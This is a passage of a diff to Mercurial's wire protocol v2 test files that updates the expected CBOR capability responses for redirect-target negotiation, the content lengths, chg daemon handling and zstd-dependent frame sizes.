s> Content-Length: 2289\r\n s> \r\n - s> 
\xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x
02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa5DnameHtarget-aHprotocolDhttpKsnirequired\xf4Ktlsversions\x82C1.2C1.3Duris\x81Shttp://example.com/Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hreq
uired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa5DnameHtarget-aHprotocolDhttpKsnirequired\xf4Ktlsversions\x82C1.2C1.3Duris\x81Shttp://example.com/Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (remote redirect target target-a is compatible) (tls1.2 !) (remote redirect target target-a requires unsupported TLS versions: 1.2, 1.3) (no-tls1.2 !) 
sending capabilities command @@ -396,9 +400,9 @@ s> Server: testing stub value\r\n s> Date: $HTTP_DATE$\r\n s> Content-Type: application/mercurial-cbor\r\n - s> Content-Length: 2335\r\n + s> Content-Length: 2316\r\n s> \r\n - s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81D
pushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x82\xa3DnameHtarget-aHprotocolDhttpDuris\x81Shttp://example.com/\xa3DnameHtarget-bHprotocolGunknownDuris\x81Vunknown://example.com/Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa
2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x82\xa3DnameHtarget-aHprotocolDhttpDuris\x81Shttp://example.com/\xa3DnameHtarget-bHprotocolGunknownDuris\x81Vunknown://example.com/Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (remote redirect target target-a is compatible) (remote redirect target target-b uses unsupported protocol: unknown) sending capabilities command @@ -731,9 +735,9 @@ s> Server: testing stub value\r\n s> Date: $HTTP_DATE$\r\n s> Content-Type: application/mercurial-cbor\r\n - s> Content-Length: 2295\r\n + s> Content-Length: 2276\r\n s> \r\n - s> 
\xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x
02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa4DnameNtarget-bad-tlsHprotocolEhttpsKsnirequired\xf5Duris\x81Thttps://example.com/Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDl
istDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa4DnameNtarget-bad-tlsHprotocolEhttpsKsnirequired\xf5Duris\x81Thttps://example.com/Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (redirect target target-bad-tls requires SNI, which is unsupported) sending capabilities command s> setsockopt(6, 1, 1) -> None (?) 
@@ -1055,9 +1059,9 @@ s> Server: testing stub value\r\n s> Date: $HTTP_DATE$\r\n s> Content-Type: application/mercurial-cbor\r\n - s> Content-Length: 2301\r\n + s> Content-Length: 2282\r\n s> \r\n - s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullLmanifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Da
rgs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa4DnameNtarget-bad-tlsHprotocolEhttpsKtlsversions\x82B42B39Duris\x81Thttps://example.com/Nv1capabilitiesY\x01\xf7batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash + s> \xa3GapibaseDapi/Dapis\xa1Pexp-http-v2-0003\xa5Hcommands\xacIbranchmap\xa2Dargs\xa0Kpermissions\x81DpullLcapabilities\xa2Dargs\xa0Kpermissions\x81DpullMchangesetdata\xa2Dargs\xa2Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84IbookmarksGparentsEphaseHrevisionIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullHfiledata\xa2Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x83HlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDpath\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullIfilesdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x84NfirstchangesetHlinknodeGparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDdictIrevisions\xa2Hrequired\xf5DtypeDlistKpermissions\x81DpullTrecommendedbatchsize\x19\xc3PEheads\xa2Dargs\xa1Jpubliconly\xa3Gdefault\xf4Hrequired\xf4DtypeDboolKpermissions\x81DpullEknown\xa2Dargs\xa1Enodes\xa3Gdefault\x80Hrequired\xf4DtypeDlistKpermissions\x81DpullHlistkeys\xa2Dargs\xa1Inamespace\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullFlookup\xa2Dargs\xa1Ckey\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullL
manifestdata\xa3Dargs\xa4Ffields\xa4Gdefault\xd9\x01\x02\x80Hrequired\xf4DtypeCsetKvalidvalues\xd9\x01\x02\x82GparentsHrevisionKhaveparents\xa3Gdefault\xf4Hrequired\xf4DtypeDboolEnodes\xa2Hrequired\xf5DtypeDlistDtree\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpullTrecommendedbatchsize\x1a\x00\x01\x86\xa0Gpushkey\xa2Dargs\xa4Ckey\xa2Hrequired\xf5DtypeEbytesInamespace\xa2Hrequired\xf5DtypeEbytesCnew\xa2Hrequired\xf5DtypeEbytesCold\xa2Hrequired\xf5DtypeEbytesKpermissions\x81DpushPrawstorefiledata\xa2Dargs\xa2Efiles\xa2Hrequired\xf5DtypeDlistJpathfilter\xa3Gdefault\xf6Hrequired\xf4DtypeDlistKpermissions\x81DpullQframingmediatypes\x81X&application/mercurial-exp-framing-0006Rpathfilterprefixes\xd9\x01\x02\x82Epath:Lrootfilesin:Nrawrepoformats\x83LgeneraldeltaHrevlogv1LsparserevlogHredirect\xa2Fhashes\x82Fsha256Dsha1Gtargets\x81\xa4DnameNtarget-bad-tlsHprotocolEhttpsKtlsversions\x82B42B39Duris\x81Thttps://example.com/Nv1capabilitiesY\x01\xe4batch branchmap $USUAL_BUNDLE2_CAPS$ changegroupsubset compression=$BUNDLE2_COMPRESSIONS$ getbundle httpheader=1024 httpmediatype=0.1rx,0.1tx,0.2tx known lookup pushkey streamreqs=generaldelta,revlogv1,sparserevlog unbundle=HG10GZ,HG10BZ,HG10UN unbundlehash (remote redirect target target-bad-tls requires unsupported TLS versions: 39, 42) sending capabilities command s> setsockopt(6, 1, 1) -> None (?) 
diff --git a/tests/test-wireproto-exchangev2-shallow.t b/tests/test-wireproto-exchangev2-shallow.t --- a/tests/test-wireproto-exchangev2-shallow.t +++ b/tests/test-wireproto-exchangev2-shallow.t @@ -176,6 +176,10 @@ updating the branch cache (sent 5 HTTP requests and * bytes; received * bytes in responses) (glob) +#if chg + $ hg --kill-chg-daemon + $ sleep 2 +#endif $ sqlite3 -line client-shallow-1/.hg/store/db.sqlite << EOF > SELECT id, path, revnum, node, p1rev, p2rev, linkrev, flags FROM filedata ORDER BY id ASC; > EOF @@ -347,6 +351,10 @@ updating the branch cache (sent 5 HTTP requests and * bytes; received * bytes in responses) (glob) +#if chg + $ hg --kill-chg-daemon + $ sleep 2 +#endif $ sqlite3 -line client-shallow-narrow-1/.hg/store/db.sqlite << EOF > SELECT id, path, revnum, node, p1rev, p2rev, linkrev, flags FROM filedata ORDER BY id ASC; > EOF diff --git a/tests/test-wireproto-exchangev2.t b/tests/test-wireproto-exchangev2.t --- a/tests/test-wireproto-exchangev2.t +++ b/tests/test-wireproto-exchangev2.t @@ -1099,7 +1099,8 @@ $ cat clone-output | grep "received frame" received frame(size=9; request=1; stream=2; streamflags=stream-begin; type=stream-settings; flags=eos) received frame(size=11; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) - received frame(size=1275; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) + received frame(size=1275; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) (no-zstd !) + received frame(size=1283; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) (zstd !) 
